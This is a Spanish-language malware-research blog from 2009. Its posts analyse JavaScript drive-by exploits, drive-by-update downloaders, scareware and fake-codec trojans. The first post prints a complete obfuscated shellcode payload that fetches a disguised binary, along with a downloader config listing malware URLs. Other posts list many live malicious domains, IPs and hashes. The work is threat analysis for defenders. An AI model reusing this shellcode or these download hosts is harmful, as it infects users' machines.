MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

5.2.09

Explotación de vulnerabilidades a través de JS

Explotar vulnerabilidades a través de diferentes tipos de formato de archivo se ha convertido en moneda corriente y en un método altamente empleado por los creadores y diseminadores de malware.

Estos métodos, que además son combinados con diferentes estrategias, se convierten en una bomba de tiempo que se detona con la simple acción de acceder a una página maliciosamente manipulada para albergar estas estrategias de ataque.

Numerosos casos como el aprovechamiento de diferentes debilidades explotadas por intermedio de archivos .js, .swf, .pdf, .mp3, incluso, simulando ser archivos .css, ponen en manifiesto que ningún tipo de archivo se encuentra exento a ser utilizado como canal de propagación y mucho menos como vector de infección.

Durante las últimas semanas, una oleada de archivos .js se vienen utilizando para redireccionar la descarga de códigos maliciosos a través de scripts ofuscados que se esconden en el cuerpo mismo del JavaScript; como el siguiente que se aloja en la URL http://www.710sese .cn/a1/realdadong .js y cuyo hash en md5 es d1094b907dfe99784b206d2ae9b1fe97:

var mybr = unescape(%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%
ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b
%ue8bb%u020f%u8b00%u8503%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe
98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1
%ub8e5%u95e8%u0000%u8900"+"%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900%u1045%u6856%ufcaa
%u7c0d%u79e8%u0000%u8900%u0845%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%
u8900%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455%u6850%u1a3
6%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e%uc778%u0
544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%
uc481%u0200%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b%u8b3c%u1
e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1%
u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u04
8b%u038b%u5ec5%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000%ua4f3%
uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u458
9%uc724%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u
5057%u55ff%u8b08%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700%u55ff%
u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff5
6%u1055%u06c7%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uec
b9%u020f%u8b00%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e%
u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318%u6afb%u2575%uc083%u8b04%ub830
%u0fe0%u0002%u0068%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff0
0%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u2f3a%u642f%u772e%u6965
%u6b78%u632e%u6d6f%u6e2f%u7765%u612f%u2e31%u7363%u0073);

La cuestión es que, entre las líneas de este script ofuscado, se ejecuta la descarga de un archivo binario, desde una URL diferente, llamado a1.css que aparenta ser un .css (Cascading Style Sheets – Hoja de estilo en cascada). Este binario es un malware.


Además, entre medio de todo el proceso de infección, que dura tan solo unos pocos segundos, establece conexión contra los sitios txt.hsdee .com y www.wdswe .com, donde, desde el primero hace un Drive-by Update en el archivo oo.txt para, cuando este responde con un 200 "OK", descargar los binarios establecidos en dicho archivo. El primero de ellos desde http://www.wdswe .com/new/new1 .exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

La información que se lee en el archivo de texto es la siguiente:

[file]
open=y
url1=http://www.wdswe .com/new/new1 .exe
url2=http://www.wdswe .com/new/new2 .exe
url3=http://www.wdswe .com/new/new3 .exe
url4=http://www.wdswe .com/new/new4 .exe
url5=http://www.wdswe .com/new/new5 .exe
url6=http://www.wdswe .com/new/new6 .exe
url7=http://www.wdswe .com/new/new7 .exe
url8=http://www.wdswe .com/new/new8 .exe
url9=http://www.wdswe .com/new/new9 .exe
url10=http://www.wdswe .com/new/new10 .exe
url11=http://www.wdswe .com/new/new11 .exe
url12=http://www.wdswe .com/new/new12 .exe
url13=http://www.wdswe .com/new/new13 .exe
url14=http://www.wdswe .com/new/new14 .exe
url15=http://www.wdswe .com/new/new15 .exe
url16=http://www1.wdswe .com/new/new16 .exe
url17=http://www1.wdswe .com/new/new17 .exe
url18=http://www1.wdswe .com/new/new18 .exe
url19=http://www1.wdswe .com/new/new19 .exe
url20=http://www1.wdswe .com/new/new20 .exe
url21=http://www1.wdswe .com/new/new21 .exe
url22=http://www1.wdswe .com/new/new22 .exe
url23=http://www1.wdswe .com/new/new23 .exe
url24=http://www1.wdswe .com/new/new24 .exe
url25=http://www1.wdswe .com/new/new25 .exe
url26=http://www1.wdswe .com/new/new26 .exe
url27=http://www1.wdswe .com/new/new27 .exe
url28=http://www1.wdswe .com/new/new28 .exe
count=28

De esta manera se produce la infección con varios códigos maliciosos, la mayoría de ellos diseñados para robar credenciales de autenticación a juegos en línea como WoW.

Algunas otras URL’s utilizadas para propagar malware de la misma manera son:

http://97.haowyt .com/js/baidu .js
http://97.haowyt .com/js/baidu .js
http://www.163wyt .com/js/yahoo .js
http://www.710sese .cn/a1/hohogl .js
http://www.710sese .cn/a1/wokaono .js
http://www.710sese .cn/a1/woriniss .js
http://qq.18i16 .net/lzz .js
http://qq.18i16 .net/bf .js
http://qq.18i16 .net/realplay .js
http://qq.18i16 .net/new .js
http://qq.18i16 .net/cx .js
http://www.baomaaa .cn/a1/realdadong .jshttp://www.baomaaa .cn/a1/hohogl .js
http://www.baomaaa .cn/a1/wokaono .js
http://www.baomaaa .cn/a1/woriniss .js
http://tj.gan7788 .com/js/js .js
http://sss.2010wyt .net/r .js
http://sss.2010wyt .net/614 .js

A pesar del empleo, por parte de los creadores de malware, de avanzadas técnicas de infección, existe un elemento fundamental que puede evitar ser víctimas de ataques similares enfocado netamente en mantener las actualizaciones completamente al día, incluidas las aplicaciones.

Información relacionada:
Drive-by Update para propagación de malware
Explotación masiva de vulnerabilidades a través de servidores fantasmas
Nueva estrategia de IS para diseminar scareware
Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs
Análisis esquemáticos de un ataque de malware basado en web

# pistus

Ver más

0 comentarios

4.2.09

Una recorrida por los últimos scareware III

Los códigos maliciosos tipo scareware (o rogue) no cesan en sus metodologías de infección. Día a día aparecen nuevos programas dañinos de este estilo, y muchos de ellos son clonaciones de otros no limitandose a la plataforma más utilizada (Windows) sino que muchos de ellos estan enfocando sus esfuerzos en ataques a otras plataformas como Mac que cada vez ganan más fanáticos.

En los últimos días se han reportado muchos casos, entre ellos:

Cleaner 2009
MD5: 58f4cae88de364d7a16d43f123d13cf8
IP: 89.18.181.9
Netherlands - Netherlands - Ion
Plataforma: Windows
Dominios asociados:
cleaner2009solution .com
Antimalwaresuite2009 .com
VT Report: 9/38 (23.69%)

Sys Antivirus 2009
MD5: 29c306e8b9791a919d6ccdd4d67b483b
IP: 94.247.2.75
Latvia Latvia - Zlkon
Plataforma: Windows
Dominios asociados:
sysantivirus2009 .com
Antivirusnano .com
VT Report: 19/39 (48.72%)

System Guard 2009
MD5: b32d763e5885a2d8520a47985a38dd8c
IP: 78.26.179.253
Ukraine Ukraine Odessa Renome-service: Joint Multimedia Cable Network
Plataforma: Windows
Dominios asociados:
systemguard2009m .com
systemguard2009 .com sgviralscan .com sgproduct .com sgproductm .com getsgd3 .com getsysgd09 .com sg10scanner com sg11scanner .com sg12scanner .com sg9scanner .com sgonlinescan .com
VT Report: 8/39 (20.51%)

AntiSpyware Bot
MD5: caed5dde32e78f4e86792fe830ac1f6e
IP: 75.125.61.162
 United States United States - Dallas - Theplanet.com Internet Services Inc
Plataforma: Windows
Dominios asociados:
2squared .com
errorsweeper .com
privacycontrol .com
regclean .com www.antispywarebot .com
VT Report: 13/39 (33.34%)

Antivirus XP Pro
MD5: 161e8f7aac8c7ffb9f94dba38125bd75
IP: 77.91.225.235
Russian Federation Russian Federation - Netplace
 Plataforma: Windows
Dominios asociados:
Allsupertubesonl .com
Antivirusxppro2008 .com
Antivirusxppro2009 .com
VT Report: 19/37 (51.36%)


IE Security
MD5: c2c79c4dbcda629f6422623a4e334840
IP: 216.240.151.135
United States United States - Los Angeles - Atmlink Inc
Plataforma: Windows
Dominios asociados:
ie-security .com
Megavidon .cn
Secured-software-order .com
ie-security-config .com
webfreescan .cn
VT Report: 22/39 (56.42%)

WinDefender 2009
MD5: e3940a9e664dd80428803a09b27d3c0e
IP: 78.157.141.6
Latvia Latvia Ultranet
Plataforma: Windows
Dominios asociados:
77.244.220.156
119.47.81.151
VT Report: 18/39 (46.16%)
WinDefender 2009 es un clon de IE Security.

Internet Smart Security
MD5: 597d74008fbf3540649a71415f719c73
IP: 199.238.181.161
United States Colorado - Englewood - Ntt America Inc
 Plataforma: Windows
Dominios asociados:
intelinet-global .net
www.intelinet-global .net
VT Report: 17/39 (43.59%)

Total Defender
MD5: 8bcb981220d0145621a88c4881a6d2d2
IP: 94.247.2.41
Latvia Latvia - Zlkon
Plataforma: Windows
Dominios asociados:
rusexportal .com
total-defender .com
Webfreefind .com
VT Report: 23/39 (58.98%)



XP Police Antivirus
MD5: 8b4e351b819eacf152938cf3f58b5c43
IP: 216.240.151.134
United States California - Los Angeles - Atmlink Inc
Plataforma: Windows
Dominios asociados:
asvpay .com
configupdatestart .com lickmydicktube .com mybestelitemovies .com ruler-cash .com ruler-stat .com spy-partners .com xp-police .com
VT report: 28/39 (71.8%)

XP Protection Center
MD5: cab283aab0df5d0b102a41a5c42317d5
IP: 206.161.126.43
United States United States - Beyond The Network America Inc
Plataforma: Windows
Dominios asociados:
xp-protection-center .com
xpp-center .com
xppcenter .com
VT Report: 37/39 (94.88%)

iMunizator
MD5: 02175c605820cffa4c2fdf8a162e7300
IP: 67.205.75.10
Ukraine Ukraine - Individual
Plataforma: Mac
Dominios asociados:
imunizator .net
VT Report: 3/39 (7.7%)
Más información en Atacando sistemas Mac a través de falasa herramienta de seguridad

AntiSpy Knight
MD5: ef7e0a364cb352a9d9aa5a3b83e2ad51
IP: 193.138.172.5
Latvia Latvia - Baltconn-net
Plataforma: Windows
Dominios asociados:
antispyknight .biz
VT Report: 11/39 (28.21%)

Post relacionados:
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware

# pistus

Ver más

0 comentarios

3.2.09

Propagación masiva de malware en falsos códecs

En alguna otra oportunidad había comentado que tanto los creadores como diseminadores de códigos maliciosos continúan haciendo uso de viejas y por demás conocidas técnicas de engaño como lo es la propagación de malware a través de falsos códecs, supuestamente necesarios para la visualización de falsos videos.

Esta conocida técnica de engaño (Ingeniería Social visual) se encuentra siendo activamente utilizada y de manera masiva para la diseminación de troyanos downloader. El nombre de los troyanos pueden ser:

TubeViewer.ver.6.exe (MD5: 1E66BEFC96CBC87FE58A8167A287ADA9)
TubePlayer.v.9.exe (MD5: 88427AF3D5DD4F641589AA0D2D40DB59)
tubeviewerfile.exe (MD5: 64C66D519FFFD889221436E09721F403)
tubeviewerfile.exe (MD5: 1F7D97194AD503A6B355DF1CEFBF001F0)
tubeviewerfile.exe (MD5: 5F25C00280E0F9075E47DCB06E908B15)
tubeviewerfile.exe (MD5: B120D58ACC1CE584E07C5F648A45AD01)
tubeviewerfile.exe (MD5: 429E897FAE57E5EA19C81B39D3745CC6)
TestCodec.v.3.127.exe (MD5: 1E2404CBAFB1E617AB0B0D3DB3EF46E3)
FlashPlayer.v.exe (MD5: CD612747CF868DF8647D47DE23AED47F)

En este caso, todas las url’s desde donde se descarga el malware son páginas pornográficas, un recurso altamente explotado para intentar infectar los sistemas de los usuarios que recurren a este tipo de sitios.

digg .com/celebrity/Namitha_Nude_Video
broken-tv .com/broadcast/?d=Namitha_nude
tube-nonstop-videos-sluts .com/xplaymovie .php?id=20081
2009-tube-collection .com/xplay .php?id=20467
tube-sex-xxx-tube .com/xplays .php?id=1802
tube-sex-xxx-tube .com/xplay .php?id=1760
tube-sex-xxx-tube.com/xplay.php?id=1819
streamingonlinetube .com/xplaymovie .php?id=385
streamingonlinetube .com/xplaymovie .php?id=334
celebnudestars .net/index .php?q=Gay%20Group%20Sex%20Video
celebnudestars .net
xxxporn-tube .com/123/2/FFFFFF/3127/TestCodec/Best
xxxporn-tube .com
brakeextra .com
uporntube-07 .com
porntubenew .com
tubeporn08 .com
tubeporn09 .com
porn-tube09 .com

Otras temáticas muy explotadas es la descarga de warez, crack, keygen, etc., donde lejos de descargar el programa deseado por el usuario, lo que se descarga es un malware. Que de hecho, la mayoría de las direcciones expuestas en este post comparten la misma dirección IP junto a otros dominios registrados que hacen alusión a la descarga de software pero aún sin contenido como:

opera-extra .com
player-codec .biz
quicktimeupdate .com
shortdownload .com
soft-free-updates .com
spacekeys .net
turboplayer .net
keyengage .net
mega-player .net
xp-extra .com

Por lo que quizás, dentro de poco nos enteremos de una nueva oleada de propagación de malware a través de estos dominios.

Información relacionada:
Técnicas de engaño que no pasan de moda

# pistus

Ver más

0 comentarios

2.2.09

Drive-by Update para propagación de malware

Para nada es novedoso decir que los códigos maliciosos de la actualidad poseen capacidades cada vez má agresivas de las cuales se valen no sólo para lograr la clásica acción de infección, sino que también realizan otras actividades como la descarga, en el sistema víctima, de una batería de programas dañinos.

El Drive-by Update permite al malware establecer una conexión clandestina contra un servidor remoto en el cual, un archivo de texto plano, dirige la maniobra de propagación indicando, al responsable de la infección primaria, qué archivos (códigos maliciosos) nuevos descargar y desde dónde.

De esta manera, a partir del momento de la infección, y con todos los inconvenientes que ello conlleva, el equipo es sometido a la manipulación de un verdadero nido de códigos maliciosos que explotarán en el sistema con las más diversas actividades para las cuales esta diseñado el malware actual, convirtiendo la máquina en parte activa de una botnet o en parte de una estructura Fast-Flux; utilizándola como "puente" para realizar ataques dirigidos y distribuidos a otros objetivos.

En el siguiente caso, utilizado como ejemplo, se descargaron los siguientes códigos maliciosos a partir de la lista pre-establecida en el servidor. En el siguiente reporte de ThreatExpert se obtiene información más detallada sobre el análisis del malware.

http://m.wuc8 .com/dd/1 .exe >> 28/39 (71.79%)
http://m.wuc8 .com/dd/2 .exe >> 25/39 (64.11%)
http://m.wuc8 .com/dd/6 .exe >> 24/39 (61.54%)
http://m.wuc8 .com/dd/9 .exe >> 31/38 (81.58%)

Por lo general, estos servidores responden a granjas, o células, de diferentes volúmenes desde las cuales cada uno de los sitios alojados son copias espejos y, en consecuencia, descargan la misma cantidad y variedad de malware.

b.wuc7 .com
d.wuc7 .com
x.wuc7 .com
m.d5x8 .com
m.wuc8 .com
w.c66f .cn
w.c66k .cn

Sin embargo, en otros casos la cantidad de malware referenciado en el archivo de texto suele ser mayor al igual que la variedad entre cada uno de ellos.

El malware es cada vez más peligroso y sigue creciendo en volumen y evolucionando en su complejidad. Técnicas como estas son las pruebas fieles de ello, dándonos una real idea de sus capacidades y de lo importante que es, para la salud de nuestra seguridad, atender adecuadamente a buenas prácticas que permitan mitigar las acciones dañinas.

# pistus

Ver más

0 comentarios

1.2.09

MySpace susceptible a amenazas a través de XSS

Durante el pasado mes se había reportado una vulnerabilidad en la conocida red social MySpace mediante la cual a través de un ataque del tipo XSS (Cross-Site Scripting) es posible diseminar malware o cometer otros actos maliciosos como el robo de perfiles.

XSS es un ataque del tipo scripting que busca explotar vulnerabilidades en el código de las aplicaciones que interpretan el lenguaje HTML, y si bien MySpace incorpora ciertas capas de protección para evitar este tipo de ataques como el bloque de la etiqueta script, la falla permite bypassear el bloqueo por lo que un atacante podría insertar y ejecutar un script malicioso de la siguiente manera:

A pesar de que a través de esta falla se expone la información, perfiles y seguridad de los usuarios, los responsables de MySpace parecen hacer la vista al costado ya que la vulnerabilidad aún no ha sido solucionada.

El problema fue reportado por su descubridor Daniel Lo Nigro el día 19 de Enero del corriente año, quien dejó un ejemplo del "script insertion" realizado, sin obtener respuesta alguna por parte de MySpace.

http://www.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=446695851

No es la primera vez, y seguramente no será la última, que MySpace sufre las consecuencias de la inseguridad a través de ataques de scripting. Lo grave del asunto es que se deja en completa disponibilidad la información, los perfiles y la seguridad de sus usuarios.

# pistus

Ver más

1 comentarios

Suscribirse a: Entradas (Atom)